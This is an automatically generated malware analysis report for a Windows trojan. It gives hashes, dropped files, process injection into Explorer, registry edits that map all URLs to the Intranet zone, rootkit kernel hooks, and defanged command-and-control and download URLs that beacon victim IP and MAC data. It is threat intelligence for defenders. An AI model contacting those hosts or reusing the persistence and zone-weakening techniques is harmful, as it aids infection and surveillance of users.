Gen.Variant.Strictor.32558_1bcbbe2a26

by malwarelabrobot on April 11th, 2015 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Strictor.32558 (B) (Emsisoft), Gen:Variant.Strictor.32558 (AdAware), GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 1bcbbe2a260c59819a80f4463bc59bad
SHA1: 8d6a3f8fd01d77355fc1e76a2c99d275d19ba99f
SHA256: 78e67cd20fe385c9d54e79e366d53488c2a9093f9492c1de1aef4fabef50b511
SSDeep: 12288:8fz94 Ms3fuEaklOaMG1 ndfNmfRuF10fEIvCv:85EfZaklOa/ dEJujF9
Size: 483328 bytes
File type: PE32
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2015-02-27 15:15:14
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nvsvc32.exe:236
ndis500.exe:1340
%original file name%.exe:1360
MiniIE.exe:2432
ndsqp.exe:560
tray.exe:2212
iawbsms.exe:4008
wininit.exe:1640

The Trojan injects its code into the following process(es):

Explorer.EXE:880

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process nvsvc32.exe:236 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20141125[1].zip (141890 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20140618_L[1].zip (160210 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\3130B1871A126520A8C47861EFE3ED4D (240 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E04822AD18D472EA5B582E6E6F8C6B9A (528 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20150218[1].zip (26706 bytes)
%WinDir%\revt\atune.exe (6342 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E04822AD18D472EA5B582E6E6F8C6B9A (256 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\3130B1871A126520A8C47861EFE3ED4D (521 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20141125[1].zip (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U9SDQR8D\20140618_L[1].zip (0 bytes)

The process ndis500.exe:1340 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\ndisweb_new.dat0 (8 bytes)
%System%\ndisweb_new.dat1 (185 bytes)
%System%\drivers\uniconfi.dat (4943 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%System%\ndisweb.log (559 bytes)

The Trojan deletes the following file(s):

%System%\ndisweb_new.dat0 (0 bytes)
%System%\ndisweb_new.dat1 (0 bytes)
%System%\drivers\ZWebNds.sys (0 bytes)
%System%\drivers\uniconfi.dat (0 bytes)

The process %original file name%.exe:1360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\ .bat (109 bytes)
%WinDir%\system\pjkni\wininit.exe (74 bytes)
%WinDir%\system\oathr\nvsvc32.exe (127 bytes)

The process ndsqp.exe:560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\ndisweb_new.dat0 (8 bytes)
%System%\ndisweb_new.dat1 (6 bytes)
%System%\drivers\uniconfi.dat (10 bytes)
%System%\drivers\ZWebNds.sys (16 bytes)
%System%\ndisweb.log (142 bytes)

The Trojan deletes the following file(s):

%System%\ndisweb_new.dat0 (0 bytes)
%System%\ndisweb_new.dat1 (0 bytes)
%WinDir%\ax01.da0 (0 bytes)
%System%\drivers\ZWebNds.sys (0 bytes)

The process tray.exe:2212 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\WaO\exec\services.exe (4331 bytes)

The process wininit.exe:1640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\WaO\MiniIE.txt (174412 bytes)
%System%\tl.dat (9 bytes)
%WinDir%\WaO\exec\tray.exe (7976 bytes)
%System%\bc.dat (1792 bytes)
%WinDir%\WaO\sys32\whitelist.txt (3 bytes)
%WinDir%\WaO\First.txt (18796 bytes)
%System%\tl.txt (676 bytes)
%System%\ndsqp.txt (12588 bytes)
%System%\safe.dat (3780 bytes)
%WinDir%\WaO\sys32\whitelist.dat (2 bytes)
%WinDir%\WaO\MiniIE.exe (7731 bytes)
%System%\ndis500.txt (44948 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kxxrdti.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\eqoztij.txt (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgcwmsq.txt (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\eaurlal.txt (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\vzszrtd.txt (10815 bytes)
%WinDir%\WaO\iawbsms.exe (110 bytes)
%WinDir%\WaO\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\miaofuk.txt (4545 bytes)
%System%\bc.txt (88388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bwsostq.txt (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tfijpnx.txt (601 bytes)
%System%\ndis500.exe (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\waoiuoq.txt (10177 bytes)
%WinDir%\WaO\sys32\urlnav.dll (83 bytes)
%System%\lhc.txt (9476 bytes)
%System%\ndsqp.exe (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tzejock.txt (7345 bytes)
%System%\safe.txt (122772 bytes)
%System%\lhc.dat (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ulmxeae.txt (13 bytes)
%WinDir%\WaO\exec\tray.txt (188360 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%WinDir%\WaO\sys32\urlnav.txt (14076 bytes)

Registry activity

The process nvsvc32.exe:236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 BB D5 37 54 A0 67 61 1B CC 99 D6 C9 E8 67 0C"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ndis500.exe:1340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 B6 F1 F0 2F 2D 4B D9 07 E8 CD F0 59 F7 1F 77"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process %original file name%.exe:1360 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 72 10 7F BC 3B 9B DE EE 8B FF 80 9F 9E C2 98"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\windows\system\pjkni]
"wininit.exe" = "Spe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\c:\windows\system\oathr]
"nvsvc32.exe" = "nvsvc32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process MiniIE.exe:2432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D0 87 A0 FE 9B 0E AF C3 A4 F8 C2 7A 2A 91 B3 A9"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"DefaultValue" = "yes"

[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\WaO\MiniIE.exe"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"DisableScriptDebuggerIE" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"CheckedValue" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"CheckedValue" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION]
"MiniIE.exe" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1601" = "0"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"UncheckedValue" = "no"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER_IE]
"UncheckedValue" = "no"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "10"
"MaxConnectionsPer1_0Server" = "10"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Disable Script Debugger" = "yes"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_DEBUGGER]
"DefaultValue" = "yes"

The process ndsqp.exe:560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 24 4D DA 7B 5E D3 FA 98 3E 40 00 D8 FB 8E 78"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\ZWebNds\Enum]
[HKLM\System\CurrentControlSet\Services\ZWebNds\Security]
[HKLM\System\CurrentControlSet\Services\ZWebNds]

The process tray.exe:2212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "84 30 BD AE 6D 74 BD 51 BF A1 86 2F 40 38 F4 DD"

The process iawbsms.exe:4008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\0\win32]
"(Default)" = "%WinDir%\WaO\sys32\urlnav.dll"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\ProgID]
"(Default)" = "Urlnav.Nav.1"

[HKCR\Urlnav.Nav]
"(Default)" = "Nav Class"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0]
"(Default)" = "urlnav 1.0 Type Library"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}]
"(Default)" = "Nav Class"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Error Dlg Displayed On Every Error" = "no"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"DefaultValue" = "yes"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Urlnav.Nav.1]
"(Default)" = "Nav Class"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"Version" = "1.0"

[HKCR\Urlnav.Nav.1\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"CheckedValue" = "yes"

[HKCR\Urlnav.Nav\CLSID]
"(Default)" = "{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\BROWSE\SCRIPT_ERROR_CACHE]
"UncheckedValue" = "no"

[HKCU\Software\Microsoft\Internet Explorer\New Windows]
"PopupMgr" = "no"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\VersionIndependentProgID]
"(Default)" = "Urlnav.Nav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 B2 2C 15 49 16 5D 3D B4 5A 0A 0E 5D 24 CB 47"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}]
"(Default)" = "INav"

[HKCR\Interface\{ED2676C8-F22C-4E60-9812-E2851B2AD210}\TypeLib]
"(Default)" = "{40195CA5-4EA4-4B10-88B3-5659A0A5310B}"

[HKCR\CLSID\{9A4DDA61-1D3A-49B7-9849-DAC6CD30A393}\InprocServer32]
"(Default)" = "%WinDir%\WaO\sys32\urlnav.dll"

[HKCR\TypeLib\{40195CA5-4EA4-4B10-88B3-5659A0A5310B}\1.0\HELPDIR]
"(Default)" = "%WinDir%\WaO\sys32\"

The process wininit.exe:1640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 36 1F 91 75 A8 20 2A 78 41 AA 24 7C 5A 62 60"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

Dropped PE files

MD5 File path
a9ed74df4d21a2d07e7ab781ff2dbaa0 c:\WINDOWS\WaO\exec\services.exe
3e9be8a760b0a33a8cffadda6b14c737 c:\WINDOWS\WaO\exec\tray.exe
534fc31ae07bde7c9096304f8bce2ad7 c:\WINDOWS\WaO\iawbsms.exe
e8e96450084e9b4516186ec9b782b85b c:\WINDOWS\WaO\sys32\urlnav.dll
e187927254ca75e9b1d703eb8db242c7 c:\WINDOWS\revt\atune.exe
4540f263d05608dcd3eb0affc059bac5 c:\WINDOWS\system32\drivers\HideSys.sys
757b6e877f54b84fce04008b7bacc87a c:\WINDOWS\system\oathr\nvsvc32.exe
61dc7a5be8dcc3edacf6eebdb309a54f c:\WINDOWS\system\pjkni\wininit.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following kernel-mode hooks:

ZwDeviceIoControlFile

The Trojan installs the following kernel-mode hooks:

ZwOpenProcess
ZwQuerySystemInformation

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
UPX0 4096 430080 0 0 d41d8cd98f00b204e9800998ecf8427e
UPX1 434176 450560 448512 5.45912 2f75ff68e3daf26adf5eda2185066321
.rsrc 884736 36864 33792 3.62856 f90bf23677ddc8194c4224822b3218d8

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://61.147.69.236/Phoenix_20150202.php?UID=00000000_00000B4B&DATE=20150410
hxxp://hpcc-page.cnc.ccgslb.net/Dragoon/20140618_L.zip
hxxp://hpcc-page.cnc.ccgslb.net/Mule/20141125.zip
hxxp://kechuang.chinacloudapp.cn/txt/listbc_20150409190211.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=692CBC266F24C5D3CF9780DA7F050725
hxxp://kechuang.chinacloudapp.cn/txt/First_20140926.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=27CABD07791EC0915B1D75AFC0B98E28
hxxp://kechuang.chinacloudapp.cn/txt/urlnav_141114.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=965923D00313F3B495AA8CE533ED63C9
hxxp://61.147.69.236/index.php?r=LPTemplar/Getinfo4GBL&cpt=55271a80013a491
hxxp://kechuang.chinacloudapp.cn/txt/popup_150407.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=903D61BFD6141512B2E9B93503C22AF3
hxxp://kechuang.chinacloudapp.cn/txt/listsf_20150409190438.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=C5C6AE13D23B73839E356DD658D8FFAB
hxxp://kechuang.chinacloudapp.cn/txt/list666_20150402170229.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=D4C0145555BF9ACCC927AF2650770FED
hxxp://kechuang.chinacloudapp.cn/txt/listtl_20150407141150.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=CD00E9BAA99F11C64A5F27BA8E8EC72C
hxxp://61.147.69.236/index.php?r=LPTemplar/Getinfo4SW&cpt=5527353c013a498
hxxp://kechuang.chinacloudapp.cn/txt/ndis500_201504091903.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=535583357E136724F48460BECFCB6A6B
hxxp://kechuang.chinacloudapp.cn/txt/qpqpqp_201504071411.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=943BDB56E3DD58E41FDB56A349DB6CBA
hxxp://61.147.69.236/index.php?r=LPTemplar/Getinfo4HB&cpt=55273897013a499
hxxp://kechuang.chinacloudapp.cn/txt/miniIE_150328.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=5C6AF7F6153B48B9FA2A2663E2D9B114
hxxp://kechuang.chinacloudapp.cn/txt/whitelist.txt?ver=3.180&uid=suibianle.0&lip=192.168.220.134&mac=000C293FC930&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94
